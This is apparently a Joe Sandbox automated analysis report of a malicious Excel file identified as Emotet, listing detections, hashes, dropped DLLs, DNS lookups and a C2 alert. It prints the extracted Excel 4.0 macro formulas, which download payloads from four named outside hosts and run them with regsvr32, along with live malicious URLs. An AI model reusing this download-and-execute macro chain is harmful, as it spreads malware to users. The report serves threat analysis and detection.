                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll | 20% | Metadefender |
                      C:\Users\user\oxnv4.ooccxx | 81% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Users\user\oxnv4.ooccxx | 20% | Metadefender |
                      C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy) | 81% | ReversingLabs | Win64.Trojan.Emotet
                      C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy) | 20% | Metadefender |

                      Source | Detection | Scanner | Label
                      9.2.regsvr32.exe.2b0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      10.2.regsvr32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      8.2.regsvr32.exe.2010000.0.unpack | 100% | Avira | HEUR/AGEN.1215461

                      Source | Detection | Scanner | Label
                      www.3d-stickers.com | 12% | Virustotal |
                      www.spinbalence.com | 12% | Virustotal |
                      navylin.com | 13% | Virustotal |
                      SourceDetectionScannerLabelLink
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://218.38.121.17/0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://www.3d-stickers.com/Content/Afa1PcRuxh/0%Avira URL Cloudsafe
                      https://www.3d-stickers.com/page-non-trouvee100%Avira URL Cloudmalware
                      https://www.spinbalence.com/Adapter/moycMR/100%Avira URL Cloudmalware
                      https://www.spinbalence.com/index.php?controller=404100%Avira URL Cloudmalware
                      http://www.3d-stickers.com/Content/Afa1PcRuxh/100%Avira URL Cloudmalware
                      http://navylin.com/bsavxiv/axHQYKl/100%Avira URL Cloudmalware
                      http://www.spinbalence.com/Adapter/moycMR/100%Avira URL Cloudmalware
                      https://secure.comodo.co0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.3d-stickers.com
                      163.172.108.69
                      truefalseunknown
                      www.spinbalence.com
                      163.172.115.127
                      truefalseunknown
                      navylin.com
                      47.92.133.65
                      truefalseunknown
                      sat7ate.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://www.3d-stickers.com/Content/Afa1PcRuxh/true
                        • Avira URL Cloud: safe
                        unknown
                        https://www.spinbalence.com/Adapter/moycMR/false
                        • Avira URL Cloud: malware
                        unknown
                        https://www.spinbalence.com/index.php?controller=404false
                        • Avira URL Cloud: malware
                        unknown
                        https://218.38.121.17/true
                        • URL Reputation: safe
                        unknown
                        http://navylin.com/bsavxiv/axHQYKl/false
                        • Avira URL Cloud: malware
                        unknown
                        https://www.3d-stickers.com/page-non-trouveetrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.spinbalence.com/Adapter/moycMR/false
                        • Avira URL Cloud: malware
                        unknown
                        http://www.3d-stickers.com/Content/Afa1PcRuxh/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/server1.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.entrust.net03regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://secure.comodo.coregsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ocsp.entrust.net0Dregsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://secure.comodo.com/CPS0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:746414
                              Start date and time:2022-11-15 12:39:06 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:4470_02112022.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@12/10@4/50
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 79.3% (good quality ratio 68.6%)
                              • Quality average: 70.1%
                              • Quality standard deviation: 34.9%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .xls
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Found warning dialog
                              • Click Ok
                              • Found warning dialog
                              • Click Ok
                              • Found warning dialog
                              • Click Ok
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:40:34 | API Interceptor | 8x Sleep call for process: regsvr32.exe modified
12:41:18 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run FatGkw.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):769024
                              Entropy (8bit):6.637885736387009
                              Encrypted:false
                              SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                              MD5:22CE6200C1714603F94B11F6DF41140F
                              SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                              SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                              SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 81%
                              • Antivirus: Metadefender, Detection: 20%, Browse
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):28672
                              Entropy (8bit):3.1569743079218417
                              Encrypted:false
                              SSDEEP:768:6kPWKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAHxKd:6XKpb8rGYrMPe3q7Q0XV5xtezEsi8/dK
                              MD5:12CE0FFD37F123D2F8492F28817265C3
                              SHA1:DF7C171FBB7B6AC05825D1C7ABC7DC60C4603D51
                              SHA-256:507A05F1A092B3CF006BE54D42D986ABF26164ACE6C2943D9832D59A8815A1AC
                              SHA-512:13CC319134AEE2BD12A6678D797EA381739790BBE3DD1E1A0E0BDA29630383F13855B280FAF62C5B8F1492C59EEC4FA64B6E3A932629B807409BAA5B106A66C7
                              Malicious:false
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):235
                              Entropy (8bit):5.508145683276218
                              Encrypted:false
                              SSDEEP:6:7KH2jzcdWTKYfq9cFQaj6oLRMmmiQWiV/EOES2nLJKq/n:OH2jLTfqGSgD9GV/dESIdKon
                              MD5:0F056143FD332A8E65047D0053992A23
                              SHA1:BEA5E0DD015238AA6A3EDA63612505484A98FAB5
                              SHA-256:5251CAF5E03664DE3A4E12E5D2F240CA585788E29980290C9CF4C44D4973809E
                              SHA-512:4CAF3C7B57FA5FDAC470D4109A727980B5F187CCF42014AF00A43BDA32D3D110B9530EE60423FE4768FC1F06EBDE4099A24F879C302CAED5845FE68694A554AD
                              Malicious:false
                              Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079.www.3d-stickers.com/.9728.1418004736.31000734.2123741222.30996786.*.
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):235
                              Entropy (8bit):5.460357111756994
                              Encrypted:false
                              SSDEEP:6:7KH2jzcdWTKYfq9cF2oQeitr8in2ohh4aESVO9LR1Xc/n:OH2jLTfqGGeordESCd1X6n
                              MD5:2166D8A7D2DFFF71395DF17D75B09E90
                              SHA1:91E904E6BA960AB3BB4D0DFEBF5F08C0F3220486
                              SHA-256:046A23BEEF7FAAAC275308BC7725C8E223BFFD251DE8C7B6EE04F5915DE77D87
                              SHA-512:D01D90802AEFC1EDD0C583324CB95C1EEA37F09964936BB3AB3FBEA647119D23CC885BA48A0F690B7BF6ED4E9783BCBD0A487F096FA7B0337C751E5767C87E8C
                              Malicious:false
                              Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075.www.3d-stickers.com/.9729.1428004736.31000734.2126704407.30996786.*.
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):299
                              Entropy (8bit):5.692045040958048
                              Encrypted:false
                              SSDEEP:6:7xHBO5Yve9eBH+XYF7ySrRm5lrCGiVdxl/OJJuSXbUOlLJhc/n:IYGwgIF7XrRolB8ekSXbzl1on
                              MD5:19E2B2D7C66D40618C81AC3546BEAE90
                              SHA1:67A9501350CC96E9E2B8BD2881C8C9235FB3FCF3
                              SHA-256:48055EA645A59A29076A5F8C4843EFDB2CFC2B118349B953151177CDF0F359CA
                              SHA-512:58FE17F4E3D2951F12F6D83EF5D452D789AEF93E7BEB934A0CD712A7B4093CB8761B7D3649FA266C5306F4CCBDC16A44B4ADC7F16B4000FE2B9FE6F70DEE3E55
                              Malicious:false
                              Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7u4EN7ldFY91oSo8hffAyJadQKSdMuXRfEPnyOP0LrcMPyEqQYzhnB8nK%2F56PKGV92LhwlADR0Cai9xEpKkyPgYTgxlYN3LtX9AYwD4O0bLpA%3D000115.www.spinbalence.com/.9217.1418004736.31000734.2119685236.30996786.*.
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):301
                              Entropy (8bit):5.6726332428940225
                              Encrypted:false
                              SSDEEP:6:7KH2jzcdWTKYfq9cF2oQeiHMbCVSFSOqtMNOVoqezONrmdUESXbUT9LlT3/n:OH2jLTfqGGeG3gOVoqezOt/ESXb8lvn
                              MD5:B8BFEB8443782B503127A33A8F8D5882
                              SHA1:285B5B5F2B62FE82F9793BD412AE11AF1A928493
                              SHA-256:6B812A7D11D3DBF7FEA4981AB42FFBBABD6FD332A0DAEAD98B43DF5CF7D6B9CF
                              SHA-512:0EE832E84AD318633EA7D2C206C5C25144D9702B973C668F488D019F92BB3A7E70D13789DE0A5DA0D1D5E2D36344CAEDBA17797802CA4AA2060C4054B31493A8
                              Malicious:false
                              Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSftoVdV7kvSqSpdfLt4fdwNPMCppuBx0MZGFj5jTVvcGNOjxE63v9YLetElu6JEvu5ONuoJotfg%2BX0z1PXLVMbs%3D000115.www.3d-stickers.com/.9217.1428004736.31000734.2133724668.30996786.*.
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):233
                              Entropy (8bit):5.522334543732003
                              Encrypted:false
                              SSDEEP:6:7xHBO5Yve9eBH+XYF7yN7sI5WysVh4gJJuSVKLAWM/n:IYGwgIF7VI5M7kScEWKn
                              MD5:149F05F2E0EC8BF53EEF327D0EFCC9AF
                              SHA1:5D6A04E27E0C976BF46754056921C9139F846F3E
                              SHA-256:DA03621D5EB7FDFB81C69553BCAEAF45C1DBBCF966B74AF29643EE03A8A2075B
                              SHA-512:B8CDDE1D30B031A4CC23592868AA30EF7156A3394E0A521F3C68EC8E9C0CD112A2F3492CBA14EC00A7B7D7240FE89896F8F162F1D359757B5BC03D11744587F9
                              Malicious:false
                              Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075.www.spinbalence.com/.9729.1408004736.31000734.2115317399.30996786.*.
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                              Category:dropped
                              Size (bytes):221696
                              Entropy (8bit):7.123700873586195
                              Encrypted:false
                              SSDEEP:6144:EKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQm4:RbGUMVWlb4
                              MD5:BF25A37885BFBAB57186B599612EA504
                              SHA1:E4D2E377862C960C63CBEE1618CF6DA3FDD4ED4C
                              SHA-256:7D59A8DA03D7F39498848490727FEB8257C49CD2435119396222080164AB9A88
                              SHA-512:73D3F9CEAA2D4725F7D3B8BECE168DB848B54ECECE9461E9FA1EE6AECDA818F581465F092FC5275002176837C87C00B093DBE6C9C0B68DCEA45B5D308FD3B3EB
                              Malicious:true
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):769024
                              Entropy (8bit):6.637885736387009
                              Encrypted:false
                              SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                              MD5:22CE6200C1714603F94B11F6DF41140F
                              SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                              SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                              SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 81%
                              • Antivirus: Metadefender, Detection: 20%, Browse
                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                              Entropy (8bit):7.123491668947418
                              TrID:
                              • Microsoft Excel sheet (30009/1) 78.94%
                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                              File name:4470_02112022.xls
                              File size:221696
                              MD5:d3b182de8c99553a9f2b6d0f3f030a4f
                              SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
                              SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
                              SHA512:3abe78e4fca03e90d59818cded37a9feff6f7ade11cee1ef07c7ccd70cc4e250f7d835161409f0e8ba97cff4a678ef234298cb293ecac60e1ec0667a8904e484
                              SSDEEP:6144:WKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQm+:XbGUMVWlb+
                              TLSH:5A24F15B77999D6DF529C33408E7035AB233FD008F6B078B3649B395AFB48A05E13246
                              Icon Hash:e4eea286a4b4bcb4
                              Document Type:OLE
                              Number of OLE Files:1
                              Has Summary Info:
                              Application Name:Microsoft Excel
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:False
                              Code Page:1251
                              Author:
                              Last Saved By:
                              Create Time:2015-06-05 18:19:34
                              Last Saved Time:2022-11-02 06:43:53
                              Creating Application:
                              Security:0
                              Document Code Page:1251
                              Thumbnail Scaling Desired:False
                              Company:
                              Contains Dirty Links:False
                              Shared Document:False
                              Changed Hyperlinks:False
                              Application Version:1048576
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.3944713856337448
                              Base64 Encoded:False
                              General
                              Stream Path:\x5SummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.2780102568870367
                              Base64 Encoded:False
                              General
                              Stream Path:Workbook
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:210174
                              Entropy:7.334559302852785
                              Base64 Encoded:True
                              Name:Sheet6
                              Extraction:dynamic
                              Type:4
                              Final:False
                              Visible:False
                              Protected:False
                              12,6,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)",G16)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv1.ooccxx")",G18)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)",G20)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv2.ooccxx")",G22)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)",G24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv3.ooccxx")",G26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)",G28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv4.ooccxx")",G30)=FORMULA("=RETURN()",G36)
                              15,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)
                              17,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx")
                              19,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)
                              21,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx")
                              23,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)
                              25,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx")
                              27,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)
                              29,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx")
                              35,6,=RETURN()
                              Name:Sheet6, Macrosheet
                              Extraction:static
                              Type:unknown
                              Final:unknown
                              Visible:True
                              Protected:unknown
                              SHEET: Sheet6, Macrosheet
                               CELL:G13, =(((((((FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!F26)&'Sheet3'!R13)&'Sheet5'!E9)&'Sheet3'!M26,G16)=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!E9)&'Sheet1'!F24)&'Sheet1'!L31,G18))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!G28)&'Sheet3'!R13)&'Sheet5'!G15)&'Sheet3'!M26,G20))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!G15)&'Sheet1'!F24)&'Sheet1'!L31,G22))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!I27)&'Sheet3'!R13)&'Sheet5'!J3)&'Sheet3'!M26,G24))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!J3)&'Sheet1'!F24)&'Sheet1'!L31,G26))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!J29)&'Sheet3'!R13)&'Sheet5'!L12)&'Sheet3'!M26,G28))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!L12)&'Sheet1'!F24)&'Sheet1'!L31,G30))=FORMULA((('Sheet1'!L24&'Sheet1'!G44)&'Sheet1'!H46)&'Sheet1'!J44,G36), 0
                               Snort IDS alert
                               Timestamp:11/15/22-12:40:56.395248
                               Protocol:TCP
                               SID:2404328
                               Message:ET CNC Feodo Tracker Reported CnC Server TCP group 15
                               Source Port:49178
                               Dest Port:443
                               Source IP:192.168.2.22
                               Dest IP:218.38.121.17
                               DNS queries
                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                               Nov 15, 2022 12:40:06.655955076 CET | 192.168.2.22 | 8.8.8.8 | 0xbe2c | Standard query (0) | sat7ate.com | A (IP address) | IN (0x0001) | false
                               Nov 15, 2022 12:40:09.279464006 CET | 192.168.2.22 | 8.8.8.8 | 0xe529 | Standard query (0) | www.spinbalence.com | A (IP address) | IN (0x0001) | false
                               Nov 15, 2022 12:40:10.640863895 CET | 192.168.2.22 | 8.8.8.8 | 0xde8d | Standard query (0) | www.3d-stickers.com | A (IP address) | IN (0x0001) | false
                               Nov 15, 2022 12:40:12.140836954 CET | 192.168.2.22 | 8.8.8.8 | 0xbac2 | Standard query (0) | navylin.com | A (IP address) | IN (0x0001) | false
                               DNS answers
                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                               Nov 15, 2022 12:40:06.853779078 CET | 8.8.8.8 | 192.168.2.22 | 0xbe2c | Server failure (2) | sat7ate.com | none | none | A (IP address) | IN (0x0001) | false
                               Nov 15, 2022 12:40:09.297105074 CET | 8.8.8.8 | 192.168.2.22 | 0xe529 | No error (0) | www.spinbalence.com | | 163.172.115.127 | A (IP address) | IN (0x0001) | false
                               Nov 15, 2022 12:40:10.675935984 CET | 8.8.8.8 | 192.168.2.22 | 0xde8d | No error (0) | www.3d-stickers.com | | 163.172.108.69 | A (IP address) | IN (0x0001) | false
                               Nov 15, 2022 12:40:12.388277054 CET | 8.8.8.8 | 192.168.2.22 | 0xbac2 | No error (0) | navylin.com | | 47.92.133.65 | A (IP address) | IN (0x0001) | false
                              • www.spinbalence.com
